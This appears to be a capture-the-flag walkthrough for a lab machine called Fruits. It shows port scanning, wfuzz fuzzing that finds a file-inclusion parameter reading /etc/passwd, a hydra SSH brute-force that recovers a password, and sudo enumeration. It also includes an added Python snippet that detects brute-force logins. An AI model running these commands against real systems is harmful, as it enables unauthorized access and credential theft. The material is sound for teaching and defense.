```text
❯ rustscan -a $ip
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.108:22
Open 192.168.56.108:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 22:45 CST
Initiating Ping Scan at 22:45
Scanning 192.168.56.108 [4 ports]
Completed Ping Scan at 22:45, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:45
Completed Parallel DNS resolution of 1 host. at 22:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:45
Scanning 192.168.56.108 [2 ports]
Discovered open port 80/tcp on 192.168.56.108
Discovered open port 22/tcp on 192.168.56.108
Completed SYN Stealth Scan at 22:45, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.56.108
Host is up, received reset ttl 63 (0.00096s latency).
Scanned at 2024-12-09 22:45:11 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (128B)
```
```text
❯ wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.56.108/FUZZ.php --hc 404 --hh 301
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.108/FUZZ.php
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        65 L     168 W      1811 Ch     "# directory-list-lowercase-2.3-medium.txt"
000000007:   200        65 L     168 W      1811 Ch     "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000003:   200        65 L     168 W      1811 Ch     "# Copyright 2007 James Fisher"
000000012:   200        65 L     168 W      1811 Ch     "# on atleast 2 different hosts"
000000013:   200        65 L     168 W      1811 Ch     "#"
000000014:   403        9 L      28 W       279 Ch      "http://192.168.56.108/.php"
000000011:   200        65 L     168 W      1811 Ch     "# Priority ordered case insensative list, where entries were found"
000000004:   200        65 L     168 W      1811 Ch     "#"
000000008:   200        65 L     168 W      1811 Ch     "# or send a letter to Creative Commons, 171 Second Street,"
000000009:   200        65 L     168 W      1811 Ch     "# Suite 300, San Francisco, California, 94105, USA."
000000005:   200        65 L     168 W      1811 Ch     "# This work is licensed under the Creative Commons"
000000010:   200        65 L     168 W      1811 Ch     "#"
000000002:   200        65 L     168 W      1811 Ch     "#"
000000006:   200        65 L     168 W      1811 Ch     "# Attribution-Share Alike 3.0 License. To view a copy of this"
000041849:   403        9 L      28 W       279 Ch      "http://192.168.56.108/.php"
000060475:   200        1 L      0 W        1 Ch        "fruits"
```
```text
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.108/fruits.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000741:   200        24 L     29 W       1128 Ch     "file"
^C
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
```
```text
❯ hydra -l bananaman -P /usr/share/wordlists/rockyou.txt ssh://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-09 23:13:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.108:22/
[STATUS] 215.00 tries/min, 215 tries in 00:01h, 14344187 to do in 1111:58h, 13 active
[22][ssh] host: 192.168.56.108   login: bananaman   password: celtic
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-09 23:14:59
```
It really did get cracked.
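From the defender's side, a brute-force run like the hydra session above is exactly what an auth-log monitor should catch. The following Python is an added example, not part of the original post: it parses constructed sshd log lines, flags any source that produces five or more failed logins within a minute, and records whether a successful login followed the burst. The hostnames, addresses and log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not from the original post): a burst of
# failures from one source followed by a success, plus unrelated noise.
SAMPLE_LOG = """\
Dec  9 23:13:46 Fruits sshd[1201]: Failed password for bananaman from 192.168.56.1 port 50210 ssh2
Dec  9 23:13:46 Fruits sshd[1203]: Failed password for bananaman from 192.168.56.1 port 50212 ssh2
Dec  9 23:13:47 Fruits sshd[1205]: Failed password for bananaman from 192.168.56.1 port 50214 ssh2
Dec  9 23:13:47 Fruits sshd[1207]: Failed password for invalid user admin from 192.168.56.1 port 50216 ssh2
Dec  9 23:13:48 Fruits sshd[1209]: Failed password for bananaman from 192.168.56.1 port 50218 ssh2
Dec  9 23:13:50 Fruits sshd[1211]: Failed password for bananaman from 192.168.56.1 port 50220 ssh2
Dec  9 23:14:58 Fruits sshd[1299]: Accepted password for bananaman from 192.168.56.1 port 50310 ssh2
Dec  9 23:20:01 Fruits sshd[1350]: Failed password for root from 192.168.56.50 port 41000 ssh2
Dec  9 23:25:00 Fruits sshd[1360]: Accepted publickey for deploy from 192.168.56.50 port 41010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)

def parse_auth_log(text, year=2024):
    """Return (timestamp, result, user, source_ip) tuples for sshd auth lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events

def detect_bruteforce(events, threshold=5, window_s=60):
    """Alert per source IP on >= threshold failures inside window_s seconds,
    and note the account if an Accepted login from that source follows."""
    failures = defaultdict(list)
    alerts = {}
    for ts, result, user, src in events:
        if result == "Failed":
            failures[src].append(ts)
            # sliding window: keep only failures newer than window_s
            recent = [t for t in failures[src] if (ts - t).total_seconds() <= window_s]
            failures[src] = recent
            if len(recent) >= threshold and src not in alerts:
                alerts[src] = {"failures": len(recent), "first": recent[0], "success_after": None}
        elif result == "Accepted" and src in alerts and alerts[src]["success_after"] is None:
            alerts[src]["success_after"] = user
    return alerts
```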
User privilege escalation
```text
ssh bananaman@$ip
The authenticity of host '192.168.56.108 (192.168.56.108)' can't be established.
ED25519 key fingerprint is SHA256:TF64A9yYMMZOZ2SQ5h4PGrHQ7iMqyvBMmX8ai4/Cznc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.108' (ED25519) to the list of known hosts.
bananaman@Fruits:~$ sudo -l
Matching Defaults entries for bananaman on Fruits:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User bananaman may run the following commands on Fruits:
    (ALL) NOPASSWD: /usr/bin/find
```
There isn't much to gather here; I found that the user has sudo rights, and while I was at it I submitted the user flag.
```text
bananaman@Fruits:~$ ls
user.txt
bananaman@Fruits:~$ cat user.txt
482c811da5d5b4bc6d497ffa98491e38
```